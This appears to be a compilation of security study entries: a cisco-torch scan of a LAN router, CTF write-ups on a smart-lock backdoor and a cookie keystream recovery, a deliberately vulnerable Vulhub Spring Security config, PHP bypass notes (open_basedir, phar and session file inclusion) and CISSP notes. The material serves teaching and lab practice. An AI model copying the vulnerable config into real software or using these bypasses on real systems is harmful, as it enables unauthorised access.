运行所有可用的扫描类型(-A)针对目标IP地址(192.168.99.202): ```shell root@kali:~# cisco-torch -A 192.168.99.202 Using config file torch.conf... Loading include and plugin ... ############################################################### # Cisco Torch Mass Scanner # # Becase we need it... # # http://www.arhont.com/cisco-torch.pl # ############################################################### List of targets contains 1 host(s) 8853: Checking 192.168.99.202 ... HUH db not found, it should be in fingerprint.db Skipping Telnet fingerprint * Cisco by SNMP found *** *System Description: Cisco Internetwork Operating System Software IOS (tm) 3600 Software (C3640-IK9O3S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2007 by cisco Systems, Inc. Compiled Wed 24-Jan-07 1 Cisco-IOS Webserver found HTTP/1.1 401 Unauthorized Date: Tue, 13 Apr 1993 00:57:07 GMT Server: cisco-IOS Accept-Ranges: none WWW-Authenticate: Basic realm="level_15_access" 401 Unauthorized Cisco WWW-Authenticate webserver found HTTP/1.1 401 Unauthorized Date: Tue, 13 Apr 1993 00:57:07 GMT Server: cisco-IOS Accept-Ranges: none WWW-Authenticate: Basic realm="level_15_access" 401 Unauthorized ---> - All scans done. Cisco Torch Mass Scanner - ---> Exiting. ``` [1]: http://www.hackingciscoexposed.com/?link=tools [2]: http://git.kali.org/gitweb/?p=packages/cisco-torch.git;a=summary%22
sec-knowleage
# Odin Part 1 (part 2 below), re, 334p, 16 solves > Problem > Statement > I’ve installed a smart lock device to the entrance door of my home a while ago. > The smart lock can be controlled using a smartphone app over Bluetooth Low Energy. > I noticed, a few times since the installation, that there're some traces left in my home like someone trespassed. > I really suspect that there’s a hidden backdoor in the smart lock. > Could you find out the backdoor command for unlocking the door? > > The genuine smartphone app unlocks the door with 1 byte length command "91" (in hex) after authorization. > Your task is to build another command bytes to unlock the door. > > I’ve got a firmware dump from BLE SoC on the smart lock board (nRF52832) using SWD and captured BLE packets on genuine app’s unlocking operation. > I also analyzed the smartphone app for smart lock and wrote a document of BLE communication protocol between the app and the smart lock. > Here is it. > > Files > Firmware dump (Memory dump of 0x00000000-0x00080000): > memdump_00000000_00080000.bin > > Captured BLE packets of genuine app’s unlocking operation: > genuine_app_unlock_operation.pcap > > Communication protocol > Structure > Every request from the app to the smart lock is written to Characteristic 38451401-282b-58d1-d5fe-9e95bb5abded as a byte array. > Every response from the smart lock to the app is sent as a byte array using Notification. > The smart lock does not have any other Services/Characteristics. > > Request format is (1 byte length command number) + (variable length payload). > Response format is (1 byte length error number) + (variable length payload). > > Known commands > CMD_GET_CHALLENGE > Number: 0x00 > Request/Response payload length: 0/16 > Description > Retrieve a ramdom challenge bytes for CMD_AUTHORIZE. > > CMD_AUTHORIZE > Number: 0x01 > Request/Response payload length: 16/0 > Description: > Authorize the sender for operating the smart lock. > > Payload is aes_ecb_encrypt(key = (Secret bytes set with CMD_INITIALIZE), cleartext = (Challenge bytes retrieved with CMD_GET_CHALLENGE)). > > CMD_GET_INFO > Number: 0x10 > Request/Response payload length: 1/variable > Description: > Retrieve information from the smart lock. > > Request payload format is (1 byte information type). > Response payload format is (variable length information). > > Known information types are 0x00 for INFO_AUTH_STATE and 0x01 for INFO_TIME. > INFO_AUTH_STATE is 1 byte length and can be 0x00 (not authorized) or 0x01 (authorized). > INFO_TIME is 7 byte length. > A sample code for the time encoding is at https://github.com/SWITCHSCIENCE/samplecodes/blob/bd1b04fc657d58787cbad00297146812ac8d95d2/PCF2129AT_breakout/mbed/Test_PCF2129AT/main.cpp . > > CMD_INITIALIZE > Number: 0x80 > Request/Response payload length: 16/0 > Description: > Set secret bytes for the authorization with CMD_AUTHORIZE. > > This command is only sent in device installation time. > > CMD_SET_TIME > Number: 0x81 > Request/Response payload length: 7/0 > Description: > Set current time. > > Time encoding is the same with CMD_GET_INFO + INFO_TIME. > > CMD_LOCK > Number: 0x90 > Request/Response payload length: 0/0 > Description: > Lock the door. > > CMD_UNLOCK > Number: 0x91 > Request/Response payload length: 0/0 > Description: > Unlock the door. > > Known error numbers > Error number will be 0x00 on success, and other numbers on failure. > Known numbers are the followings. > > ERR_SUCCESS = 0x00 > ERR_INVALID_LENGTH = 0x01 > ERR_INVALID_DATA = 0x02 > ERR_INVALID_CMD = 0x03 > ERR_NOT_AUTHORIZED = 0x10 > > Flag Format > The backdoor command for unlocking the door is the flag. > If the command is “12 34 ab cd” in hex, the flag will be “CBCTF{1234abcd}”. In this problem we got two files, ARM firmware memory dump, and Bluetooth packet dump. From task description we knew the apparent protocol, as well as that there is a backdoor hidden in firmware allowing to open doors without authentication. Searching the firmware for protocol constants, such as 0x91, we found function responsible for packet dispatch. It was fairly straightforward and in line with the description, with one exception: there was additional undocumented command 0x20. It checked 8 following bytes, four of which had to be equal to part of device's MAC address, and the other four random-looking constant. If they matched, tenth byte was checked and depending on its value, door was locked or unlocked. The only thing we didn't get from the firmware was the MAC address - thankfully it was transmitted and captured in packet dump. With all the information gathered, we could craft backdoor packet. # Odin Part 2, re, 335p, 13 solves > Problem > Statement > This smart lock has a logging function that records every operation. > The log is readable only by some special management device. > Though I don’t have the device, I’ve got a EEPROM dump on the smart lock board which looks like holding the log. > Could you analyze it and find out when the backdoor was exploited for the first time? > File > eeprom.bin > Flag format > Flag format is CBCTF{YYYYMMDDhhmmss}. > If the date is 2018/07/01 12:34:56, the flag will be “CBCTF{20180701123456}”. The firmware indeed wrote some data to EEPROM just before dispatching Bluetooth packets. It logged each packet in 16-byte chunks, first 7 of which were packed timestamp, and the remainder - packet payload. The whole block was AES encrypted with constant key. After decrypting EEPROM blocks, decoding timestamps, we looked for packets starting with 0x20 byte, i.e. backdoor command. There were only two of these, and the first one corresponded to time of compromise. Code: ```python from Crypto.Cipher import AES key = "88AD3D8347B8CE82082064B4618D7637".decode("hex") a = AES.new(key, AES.MODE_ECB) data = open("eeprom", "rb").read() for i in range(len(data) / 16): line = data[i*16:i*16+16] if line == "\xff" * 16: break line = a.decrypt(line) date = line[:7] payload = line[7:] if payload[0] == ' ': print date.encode("hex"), print payload.encode("hex") cmd = [ord(x) for x in date] dts = ((cmd[0] >> 4) * 10) + (cmd[0] & 0x0F); dtm = ((cmd[1] >> 4) * 10) + (cmd[1] & 0x0F); dth = ((cmd[2] >> 4) * 10) + (cmd[2] & 0x0F); dtd = ((cmd[3] >> 4) * 10) + (cmd[3] & 0x0F); dtwd = ((cmd[4] >> 4) * 10) + (cmd[4] & 0x0F); dtmm = ((cmd[5] >> 4) * 10) + (cmd[5] & 0x0F); dty = ((cmd[6] >> 4) * 10) + (cmd[6] & 0x0F); print dty, dtmm, dtd print dth, dtm, dts ```
sec-knowleage
# 2020 eBay Riddle Writeup for the 2020 eBay Riddle which was part of their recruitment campaign. The riddle was advertised [here](https://rnd.ebay.co.il/riddle/). Details can be found [here](https://www.calcalist.co.il/local/articles/0,7340,L-3867974,00.html).
sec-knowleage
# Hack-tac-toe (Web/Crypto) In the task we have access to a webpage where two players can play tic-tac-toe. Part of the logic is client-side and part is server side. We notice right away that there is a cookie `Encrypted_Game_Session` which changes while we play. By analysing how the cookie changes we can see that for example changing a single letter of player name the cookie changes by a single byte. This indicates some kind of stream cipher applied over the game state. However, since nothing else changes it indicates that the keystream stays the same, at least for the current user. This means if we could retrieve the keystream, we could decrypt the game state and potentially change it however we want. It is quite simple to recover the keystream following the player name, since keystream is simply XORed with plaintext, and we know the plaintext and we know the position of this plaintext (we can see where the ciphertext changed when we supplied a new player name). We can: 1. Get the original cookie 2. Set name to 'a'*100 3. Get the new cookie 4. Notice that the difference starts at 112 byte 5. Get bytes [112:(112+100)] from the second cookie and XOR them with 'a'*100 to recover the keystream 6. XOR the keystream with original cookie from position 112 This gives us: `ayer 1";s:5:"name2";s:8:"Player 2";s:5:"score";i:0;s:6:"score2";i:0;}` Which is part of the decrypted cookie. Here we were a bit confused what to do next. It seems we have here some PHP serialization, but no real way to exploit it. Fortunately we looked at the recovered keystream: `400ea7a58971b0f78fa9c6ed298764a8400ea7a58971b0f78fa9c6ed298764a8400ea7a58971b0f78fa9c6ed298764a8400ea7a58971b0f78fa9c6ed298764a8400ea7a58971b0f78fa9c6ed298764a8400ea7a58971b0f78fa9c6ed298764a8400ea7a5` And we noticed that it repeats itself! The unique part is just 16 bytes: `400ea7a58971b0f78fa9c6ed298764a8` It means we can simply decrypt the whole payload by XORing the cookie with repeated key: `a:5:{s:4:"flag";s:70:"DCTF{5740379144eb29f04ff6536733eba47e4bdfa0f0faade836b7bc0d70fa1ab006}";s:4:"name";s:8:"Player 1";s:5:"name2";s:8:"Player 2";s:5:"score";i:0;s:6:"score2";i:0;}` The whole solver script [here](toe.py)
sec-knowleage
package com.vulhub.authzvuln; import org.springframework.context.annotation.Configuration; import org.springframework.security.config.annotation.web.builders.HttpSecurity; import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity; import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter; @Configuration @EnableWebSecurity public class SpringSecurityConfig extends WebSecurityConfigurerAdapter { @Override protected void configure(HttpSecurity httpSecurity) throws Exception{ httpSecurity.authorizeRequests().regexMatchers("/admin/.*").authenticated(); } }
sec-knowleage
# Wired CSV, misc, 220p > We have a photo and a CSV file. NOTE: The flag does not follow the CTF{...} format, but is clearly marked as the flag. Please add the CTF{...} around the flag manually when submitting. The chip on the attached photo was POKEY, which interfaces with keyboard on Atari. We also got a CSV with logic dumps of several pins, which were D0-D5 and select lines. If we dump state of Dx at times when the select is on, then we should get raw keyboard codes. We also found a code to character mapping somewhere on the internet, which finally allowed us to create `read.py` and get the flag.
sec-knowleage
原文 by PHITH0N ## php5.2以前 1、__autoload加载类文件,但只能调用一次这个函数,所以可以用spl_autoload_register加载类 ## php5.3 1、新增了glob://和phar://流包装 glob用来列目录,绕过open_basedir http://php.net/manual/zh/wrappers.phar.php phar在文件包含中可以用来绕过一些后缀的限制 http://php.net/manual/zh/wrappers.phar.php 2、新的全局变量__DIR__ 3、默认开启<?= $xxoo;?>,5.4也可用 ## php5.4 1、移除安全模式、魔术引号 2、register_globals 和 register_long_arrays php.ini 指令被移除。 3、php.ini新增session.upload_progress.enabled,默认为1,可用来文件包含 http://php.net/manual/zh/session.configuration.php http://php.net/manual/zh/session.upload-progress.php 4、如果编译的时候没有加--disable-short-tags,则PHP默认开启短标签。在PHP5.4以后,即使php.ini中设置了short_open_tag=false,短标签 <?=..?> 也不受影响,永远可用。 ​​​​ ## php5.5 1、废除preg_replace的/e模式(不是移除) 当使用被弃用的 e 修饰符时, 这个函数会转义一些字符(即:'、"、 \ 和 NULL) 然后进行后向引用替换。 http://php.net/manual/zh/function.preg-replace.php ## php5.6 1、使用 ... 运算符定义变长参数函数 http://php.net/manual/zh/functions.arguments.php#functions.variable-arg-list ## php7.0 1、十六进制字符串不再是认为是数字 2、移除asp和script php标签 <% %> <%= %> <script language="php"></script> ## php7.1 http://php.net/manual/zh/migration71.new-features.php 1、废除mb_ereg_replace()和mb_eregi_replace()的Eval选项
sec-knowleage
CISSP官方教材最完备精华笔记 卫剑钒 本笔记遵循CC协议,署名-非商业性使用-相同方式共享 说明 本PPT是作者在对OSG书第7版的精华摘取和总结ᨀ炼。 精华涵盖了OSG书所有值得了解和记忆的知识点。 通过该精华笔记,以及OSG练习题,我一次性顺利通过CISSP考试。 本人公众号:微月人话 本人微信:weijianfan 说明 本笔记绝大多数内容,主要来自OSG书。 少部分内容来自AIO。 更少部分内容来自本人查看其他资料后的理解和整理。 本笔记涵盖的知识点,应考已经比较充分。 但考题中的确有OSG和AIO中都没有的东西。 PPT标注OSGT的,表明知识点来自OSG题,是OSG书中没有的。 部分内容会反复出现,原因是OSG中即是如此,本PPT忠于原书结构。 领域1-安全和风险管理 第1章 通过原则和策略的安全治理 1、常见的机密性保护措施:加密、流量填充、访问控制、身份认证、数 据分类、人员培训。 2、如果缺乏完整性,机密性也无法被维护。 3、机密性的相关概念还有:敏感性、自主性(自主决策是否披露信息)、 隐蔽性(concealment)是覆盖、混淆、干扰;隐藏性(seclusion)是把 信息放在一个偏僻的位置;隔离性。 4、完整性:应该禁止未授权的修改操作,禁止授权了的主体执行了未授 权的修改操作,比如操作失误(删文件、更改配置、脚本错误)其实是 破坏了完整性,虽然授权了,但做了未授权的事。 5、完整性保护应该让客体内外保持一致,破坏完整性的事:病毒、逻辑 炸弹、漏洞、后门等等。要对各种活动进行记录,这样可以对完整性进 行监控。 5、完整性保护应该让客体内外保持一致,破坏完整性的事:病毒、逻辑 炸弹、漏洞、后门等等。要对各种活动进行记录,这样可以对完整性进 行监控。 6、保护完整性措施:访问控制、身份认证、入侵检测、加密(让他不好 改)、散列、接口限制、人员培训。 7、可用性:对可用性的破坏事件(不当行为或者失误):意外删除文件, 资源分配不足,软硬件使用过度、客体分类不对或贴错标签(贴错了, 所以不可用)。 8、任何用户(包括管理员)的不当行为都可能破坏可用性,比如:对安 全策略的疏忽,对安全控制的配置不正确。 9、缺乏完整性和机密性,就无法维护可用性。 10、身份标识同时开启了可问责性。 11、什么是3A:认证、授权、可问责性(审计)。但实际上它指的是 5 个元素:身份识别、身份认证、授权、审计和可问责性。 12、只有支持可问责性,才能够正确实施组织的安全策略。(前ᨀ是认 证、日志等等都是准确的,不能只是简单的口令认证,有相应的通知和 警告、证据确凿,要让法庭相信你的证据) 13、不可否认性是可问责性不可缺少的部分。(通过数字证书、会话ID、 事务日志、访问控制机制等等建立) 14、审计或监控(monitoring)是实施可问责性的程序化方式。 15、审计不仅记录主体及其客体的活动,而且还记录核心系统的活动。 比如系统崩溃可能表明存在bug或入侵企图。 16、日志文件为重建事件、入侵和系统故障的历史ᨀ供了审计踪迹 (audit trails)。 17、信息安全保护方法: 分层(连续分层/深度防御/多个实体防御) 抽象(分类管理) 数据隐藏(data hiding/访问控制) 加密 18、顾名思义,数据隐藏(data hiding)通过将数据置于主体不可访问或 无法看到的存储空间,从而防止主体发现或访问数据。比如: 不让未授权的访问者访问数据库; 限制分类级别较低的主体访问级别较高的数据也属于这种情况; 阻止应用程序直接访问硬件。 在安全控制和程序设计中,数据隐藏通常是一个关键要素。 19、安全是商业运行问题,是组织流程,而不只是 IT 怪才在幕后所谋之 事。使用安全治理这个术语就是为了强调这一点,这意味着安全是需要 整个组织同时进行管理和控制的,而不只是在 IT 部门。 20、安全管理计划(planning)目的是确保安全策略的适当创建、实现和 实施。 20、安全管理计划将安全功能和组织战略、目标、任务、愿景相结合, 它采用自上而下的方法,上层制定策略,中层制定标准、基准、指导方 针和程序,底层也即操作层实现配置,用户遵守策略。(安全管理计划 可以理解为安全规划、安全计划。) 21、安全管理计划必须要得到高级管理者(senior manager,也即单位领 导)的批准。否则就不易成功。 22、开发和实现安全策略,证明高层对安全问题实现了due care和due diligence,减少他们的过失和责任。 23、安全管理是一个业务运行问题,而不是一个IT管理问题,安全管理 团队应该独立于其他所有部门,团队由CSO(首席安全官)领导,CSO直 接向高层汇报,增加自主权,避免权力斗争。 24、战略计划可以5年,战术计划可以1年,操作计划是短期的(经常更 新,培训计划、系统部署计划)。 25、安全治理由治理委员会或至少董事会进行,这群人应该是有影响力 的专家。 26、变更管理的目标是确保任何变更都不能降低或危及安全性。而且能 回滚。 变更管理是涉及软硬件所有生命周期的,并更总是处于控制之下。 27、变更操作需要测试,变更前要通知用户,变更的影响要加以分析, 变更要经过变更审批委员会CAB批准 28、数据分类的7个步骤:明确职责,明确标准,分类加标签,记录例外 并加入评估标准,选择安全控制,指定解除分类过程,制定流程让大家 都知道。 29、绝密(top secret)、秘密(secret)、机密(confidential)、非机密 (unclassified),如果泄露分别对应grave 、critical、serious damage。所 有分类的信息都免受信息自由法案限制。 30、商业/私营部门的分类有三种:机密/专有数据(confidential/ proprietary)、隐私(private,偏个人)、敏感(泄漏后对公司有负面影 响)、公开。 31、proprietary data是公司的专有数据,泄漏后会对组织的竞争力产生灾 难性后果(drastic effects )。 32、决策都是高层管理者作出的,安全专家在本质上是工程师,能制定 和实现安全策略,能设计和实现安全解决方案。 33、数据所有者(owner)负责对信息分类,一般会将数据管理的任务委 派给数据管理员(custodian),数据管理员负责CIA保护,备份、存储、 确认完整性、部署安全解决方案。 34、审计人员的角色可以分配给安全专家和受过培训的用户。 35、COBIT(Control objectives for Information and related technology)信 息及相关技术控制目标,定义了用于正确管理IT并确保IT满足业务需求的 控制目标。五个原则: 1、满足利益相关者需求 2、端到端覆盖(全面覆盖所有流程和职能) 3、单一集成框架(红绿灯) 4、整体方法(把公司当一个整体来考虑,不能头痛医头) 5、把治理从管理中分离出来。 36、COSO(Committee of Sponsoring organizations )是企业治理模型, COSO更多面向战略层面,COBIT则更关注操作层面。 Cobit是满足众多COSO目标的一种方式。 37、ISO27002取代了ISO 17799 39、安全策略的类型: 规章式的(regulatory,必须遵守的规章制度) 建议式的(讨论可接受的行为和活动以及违背的后果,大多是建议性 的) 信息式的(比如有的文档仅仅告知了安全目标、安全需求) 40、安全策略不针对特定个体,而是针对角色。可接受的使用策略 (acceptable use policy,AUP)定义了可接受的行为和期望的行为,不遵 循的话会受到惩罚。 42、标准为硬件、软件、技术和安全控制方法定义了统一协调的强制性 要求。标准是战术文档,定义了达到安全策略的步骤或方法。 43、基准(baselines)定义了安全性的最低级别。没有达到基准应该排 除在生产系统之外。 44、指南(guidelines)ᨀ供了如何实现标准和基准的建议。并且能够作 为专家和用户的操作指南。是非强制性的。 45、安全程序(procedures)是step by step的How-to。主要是保障业务流 程的完整性。 46、策略在顶端,然后是标准,基线,指南,最底层的是程序。 47、威胁建模这个行为是主动(proactive)的,但一旦部署实施,就成 为被动(reactive)措施。 48、微软SDL的SD3+C:secure by Design、Default、Deployment and Communication。 49、并不是所有的威胁都可以在设计阶段(这是主动的威胁建模)发现, 还是需要被动式的威胁建模(渗透测试,代码审查、模糊测试等),然 后再打补丁,被动方法看似捷径,但从成本上和有效性上讲,不如主动 式。 50、识别威胁的结构化方法(以下一种或多种): 关注资产(资产估值)、 关注攻击者(识别攻击者及其代表的威胁,但可能会有新的威胁)、 关注软件(关注开发编码带来的威胁) 51、微软的STRIDE威胁分类:Spoofing(欺骗)、Tampering(篡改)、 Repudiation、Information disclosure(如代码注释信息、调试信息泄漏)、 DoS(永久DOS能破坏数据和固件)、Elevation。 52、威胁建模的分解(reduction)分析的5个关键点:信任边界、数据流 路径、输入点、特权操作、安全立场(安全策略、安全基础、安全假设) 53、威胁排序:三种方法:概率*潜在损失 ;高/中/低;DREAD系统 概率*损失,都是从1到10排序,1是最低,10是最高。结果从1到100, 100是最严重的风险。 高中低、高级别的要立刻解决,中级别的最终也要解决但不用那么 急,低优先级的要评估一下,如果成本太高威胁很小,也可以不解决。 DREAD系统:对每种威胁回答5个问题:潜在破坏(Damage potential)、再现性(Reproducibility)、可利用性(Exploitability)、受 影响用户(Affected user)、可发现行(Discoverability)(攻击者发现弱 点有多难?),对这些问题的回答标注H/M/L或3/2/1,即可得到一个威 胁优先级表。 54、把安全风险考虑到采购策略中:外部实体要在他们的业务操作中体 现出安全性意识。 第2章 人员安全和风险管理概念 1、在任何安全解决方案中,人都是最薄弱的环节。 2、职责分离可以看作是最小特权原则(知所必需)的应用,阻止一个人 搞破坏的能力,也能够防止共谋(两人或多人共同完成的负面活动); 比如数据库、防火墙、用户账户、文件管理、网络管理都由不同的管理 员来负责。 3、岗位轮换:可以ᨀ供知识冗余,避免员工不在岗导致的停工或效率降 低;一个人在特定岗位时间越长,特权可能越来越多,岗位轮换可以减 少伪造、偷窃、阴谋破坏和信息滥用的风险,如果滥用,很容易被另一 位了解该工作的员工发现。 4、工作᧿述很重要,不仅仅在签雇佣协议时使用,还应该在组织的整个 生命周期内维护,有助于职责分离,有助于审计(可以在强制休假时开 展)。要定期审计工作᧿述,查看相对应的工作᧿述和特权和实际工作 的偏差。 5、一个工作᧿述的职责和另一个工作᧿述的职责要尽可能不覆盖 (overlap),不能出现偏移和侵占(drift or encroach)的情况。 6、雇佣员工时的背景调查包括:获得候选人的工作和教育历史记录;检 查证明材料;与候选人的同事、邻居和朋友进行会面;向公安局和政府 机关调查候选人的拘捕或违法活动记录;通过指纹、驾驶执照和出生证 明来认证身份;面试。此外还可以采用测谎仪、药检、性格测试/评估等 形式。 7、很多组织对申请人进行在线背景调查和社交网络账户复审,如果一个 潜在的员工在社交网站发送不适当的材料,就会减分。通过查看一个人 的网络身份,很快收集到这个人的态度、智力、忠诚、常识、勤奋、诚 实、尊重、坚定性、遵守社会准则以及企业文化等方面的大致情况。 8、雇佣新员工时,应该签署雇佣协议。协议文档说明了组织的规则和限 制、安全策略、可接受的使用和行为准则、详细的工作᧿述、破坏活动 及其后果、要求员工胜任工作所需的时间。其中,很多条目都是独立的 文档。 9、除了雇佣协议,还有一个保密协议(NDA,NonDisclosure Agrement), 还有个竞业禁止协议(NCA,NonCompete Agreement),但在法庭上, 如果NCA妨碍员工获得适当的收入,则NCA无效,但这个诉讼威胁和可能 漫长的官司足够吓人。 10、解雇员工要用不公开和尊重人的方式,终止合同时要有一名证人 (高层管理者或者安保人员)在场。然后被护送离开建筑物,回办公座 位收拾个人物品的时候也要有安保陪同。要交还各种证件和卡片(包括 停车证)。通知解雇前或者解雇谈话的同时就禁用或冻结账号。 11、通知所有安全人员和监控出入口的人员,被解雇的员工只能在安全 人员的护送下再次进入工作场所。要ᨀ醒被解雇员工NDA协议,安排新 员工进驻工位,允许此解雇信息给媒体。 12、使用任何类型的第三方服务时,SLA都很重要,约定各种指标(系统 运行时间、最长停机时间、最大负载、平均负载、故障响应、故障转移 (failover)时间),包括财务和合同补救措施。这是降低风险 (reduction)或回避风险(avoidance)的重要部分。明确期望和惩罚。 13、隐私主要是指那些能定位到主体的信息,未授权访问个人机密信息 是不允许的,被未同意或未知晓的监控、检查也是不允许的。 14、PII(personal Identifiable information,个人身份信息)就是能让人追 溯到源头的人或涉及人的数据项(电话号码、邮件地址、名字等等), 但MAC和IP这些不是PII。 15、HIPAA、2002年的萨班斯法案(SOX)、PCI-DSS对隐私都有要求,必 须要在组织的安全策略中有个说法。 16、安全治理、企业治理、IT治理的目标都是维持业务流程并追求增长 和弹性。 17、第三方治理一般由法规和标准做管理要求,由外部人员(被管理组 织(比如银监会)指定的审计人员或自己找的顾问)实施的治理,重点 是验证合规性。要开放全面的文档交换。 18、风险管理的目的是把风险降低到一个可以接受的级别。 19、风险分析包括:分析环境中的风险,评估风险发生的可能性和造成 的损失,对资产进行评估,并做优先级分类,评估风险对策的成本,制 作报告ᨀ交上级管理者。 20、威胁(Threats) 就是可能会带来不良后果的事情(occurrence); 21、威胁主体(agent)可能是人(黑客、员工、误操作)、软硬件(病 毒、bug、设备故障)、网络、自然界。 22、脆弱性(Vulnerability )是客体中的弱点或者措施的缺乏。 23、威胁事件(event)是脆弱性的意外或有意利用:火灾、地震、系统 故障、人为错误。 24、暴露(exposure)᧿述了一资产损失的种可能性,当存在脆弱性, 又存在能利用这种脆弱性的威胁,威胁事件就可能发生。(其实就是风 险) 26、安全的目标就是消除脆弱性、阻碍(block)威胁。防护措施 (safeguard, or countermeasure)就是消除脆弱性和防范威胁的。 27、攻击就是威胁主体对脆弱性的利用。 28、破坏(breach)就是安全机制被绕过的事情。 当攻击和破坏结合时, 就会发生渗透。 29、风险评估和分析应该由团队来做,人员要尽可能多样性,有助于彻 底识别威胁和风险。通常是请人来做。 30、风险评估是上层管理者的事,评估结果和决策要得到他们的理解和 批准,表明他们应尽关注。上层管理者得决定哪些风险可以接受哪些不 能接受。 31、定量的风险是定位到美元的。定性的是主观的和无形的价值。纯粹 的定量是不可能的,大多数使用混合的风险评估方法。 32、定量风险分析的6个步骤: 1.列出资产清单和分配资产价值 AV 2.研究每项资产,生成威胁列表,计算暴露因子EF、计算单一损失期望 SLE (exposure factor single loss expectancy) SLE= EF*AV 3.计算年发生率ARO (annualized rate of occurrance) 4.计算年度损失期望ALE ALE=ARO*SLE 5.研究每个威胁的对策,再计算ARO和ALE EF可能不变,因为对策失效后EF可能不变,ARO一般都会降低 6.针对每个资产分析每个对策成本/效益分析 (cost/benefit) 比如:资产的价值是 200000 美元,并且针对特定威胁的 EF 为 45%, 那么这个资产的威胁的 SLE 就是 90000 美元。 33、使用防护措施前ALE1-防护后ALE2-防护措施年度成本ACS(annual cost of safeguard)= 价值 ALE1-ALE2-ACS > 0 ? 如果为负就不用保护。 34、成本/效益分析是非常重要的因素,但并非唯一因素。高级管理部 门的人员甚至 IT 职员,应当负责通过获取数据和信息来确定最佳的安全 决策。其他因素包括:实际成本、安全预算、措施与现有系统的兼容性、 IT职员的技能/知识水平、产品的可用性、政治问题、合作关系、市场趋 势、流行趋势、市场推广、合同和偏爱。 35、定性分析采用场景(scenarios)方法,场景是对单个主要威胁的书 面᧿述。᧿述的重心集中在威胁是如何产生的及其对组织、IT 基础设施 和特定的资产会产生什么影响。 36、定性分析采用很多种技术,比如自由讨论、Delphi 技术、故事板 Storyboarding、焦点组Focus groups 、调查问卷、Checklist、一对一的会 议、面谈。 37、Delphi技术,是一种简单的匿名反馈过程,反复直到达成一致意见。 38、风险分析的结果包括: 所有资产的完整且详细的评估; 所有威胁和风险、发生概率以及一旦发生的损失范围的详细列表。 针对每个威胁的防护措施列表,标明其有效性和ALE。 每个防护措施的成本/效益分析。 39、对待风险的方法: 降低reduce or mitigate,也是潜在的规避avoidance,删除FTP协议,搬 家防飓风 转让assign or transfer 购买保险、外包 接受accept 这种情况要“书面签字”,谁决策谁签字谁负责,是否接 受依据风险容忍和风险偏好 拒绝reject or ignore 这是一种未尽due care的做法 实现了对策以后,仍然存在的风险是剩余风险。(尤其是选择了接受 风险而不加保护的风险) 40、总风险(威胁*脆弱性*资产价值 = ARO*EF*AV)- 控制间隙 = 剩余 风险 41、对策(countermeasure),对策成本应该小于对策的收益;应该让 攻击者的成本大于成功后的收益; 42、对策不应该基于“security by obscurity” ,对策应该提供fail-safe(考 虑人员安全) and/or fail-secure(考虑仍然保持安全)选项。 43、深度防御的最外层是物理性控制,然后是逻辑/技术控制,然后是行 政管理控制,最核心要保护的是资产。(物防、技防、人防) 44、控制的类型有 威慑(deterrent,安全培训、安全标识、保安) 预防(preventive,围墙、锁、加密、IPS) block 检测(detective,工作轮换、蜜罐、IDS) 补偿(compensating,附加的或增强的安全措施,比如用传输加密增强 安全性,比如没有智能卡的时候先用令牌) 纠正(corrective,重启、删除病毒等将系统还原的方法)、纠正是还 原系统的操作 恢复(recovery,备份和恢复、容错、集群)要恢复的是业务,是冗余 措施的作用体现 指令(疏散路线、监督、培训、安全策略要求,强制或鼓励主体遵循 安全策略) 45、NIST的风险管理框架RMF:六个步骤:1、分类信息系统;2、选择 安全控制;3、实施安全控制;4、评估安全控制;5、授权信息系统;6、 监控安全控制;然后,如有必要,重复。 46、风险分析的最后一项关键任务就是风险报告,并需要呈现给利益相 关方。 47、安全意识在整个组织上建立起对安全的理解的共同的基线和基础。 需要不断培训,需要不断更新。 48、为了管理安全功能,必须采取安全治理,执行风险评估以驱动安全 策略的实施是最明显、最直接的安全功能管理的例子。 49、安全必须可度量(measurable),可度量的安全意味着安全机制功 能的多个方面能ᨀ供明确收益,需要测量很多指标,来观察安全措施带 来的收益。 第3章 业务连续性计划(BCP) 业务连续性计划(Business Continuity Planning, BCP)涉及对组织各种过 程的风险评估,还有在发生风险的情况下为了使风险对组织的影响降至 最小程度而制定的各种策略、计划和措施。 1、BCP涉及风险评估以及发生风险时而制定的各种策略、计划和措施。 2、BCP关注在基础设施和资源减少及受限的情况下,维持关键工作任务 的能力的持续性,如果BCP失败,连续性受到破坏,则进入灾难模式,将 采用灾难恢复计划DRP。 BCP和DRP首先考虑的都是人。 3、BCP的4个主要步骤: 1、项目范围和计划编制; 2、业务影响评估BIA; 3、连续性计划(包括批准和实施); 4、文档化。 (一)项目范围和计划编制方面: 先由先头部队做业务组织分析(确定关键组织和人),然后创建 BCP团队(一堆人,领导协调),然后评估可用资源、分析法律法规。 (1)业务组织分析;由先头部队完成,主要是确定参与BCP编制的部门 及人员。此时BCP团队尚未组建。 分析的内容:对业务组织进行分析,确认哪些部门和哪些人,对BCP过 程是至关重要的(stake), 结果:负责关键业务的运营部门、IT部门以及其他保障工厂、站点的维 护部门、操作部门、保养部门、高层、非常重要的关键个人 这个分析结果可以帮助选择BCP团队,而BCP团队一成立,第一件事就 是审查并修正这个分析结果。 (2)组建BCP团队;这个团队里包括核心业务部门代表、重要支持部门 (上一阶段分析发现的)的代表、IT代表、懂BCP的安全代表、法律代表、 高层代表,人才要多样化,关系要协调。都认为自己部门和业务重要, 这时候就需要平衡,需要领导来协调。而且注意领导在应急计划中应该 有due diligence的活。 (3)评估可用资源;团队需要资源来实施4个步骤,BCP的测试、维护、 培训都需要人、软硬件。灾难来袭时,BCP实现需要大量的资源,包含大 量的人力。 (4)法律和法规分析;各种法律和法规对应急情况下的持续运营都ᨀ出 了要求。而且要考虑是否违反了对别人ᨀ供服务的SLA。所以要法律顾问 进来是非常重要的,而且要全程参与,包括测试和维护阶段。这里的合 规还包含了业务领导的尽职问题。 注意一点:在许多组织中,IT和/或安全部门]被指定对业务连续性计划负 有专门的责任。运营部门和其他支持部门在计划编制过程中没有发言权, 甚至都不知道它的存在,直至灾难发生或即将来临。这是一个致命的缺 陷!所以一定要组建一个BCP团队。 (二)业务影响评估(BIA,business impact assessment) BIA确定业务优先级,确定MTD、RTO,识别对这些业务资源的风险 (定性分析),威胁的可能性(ARO)、可能的影响(确定ALE),最后 将定量分析和定性分析结合起来确定资源分配的优先级。 BIAᨀ供一些定量化的方法用于确定要保护资源的优先级;定量决策: 适用数字和公式作出决定,用美元表示。定性决策:考虑情感、信心、 员工稳定性以及其他,用高中低之类的方法表示。 (1)确定业务优先级。第一个BIA任务是确定业务优先级,并且按重要 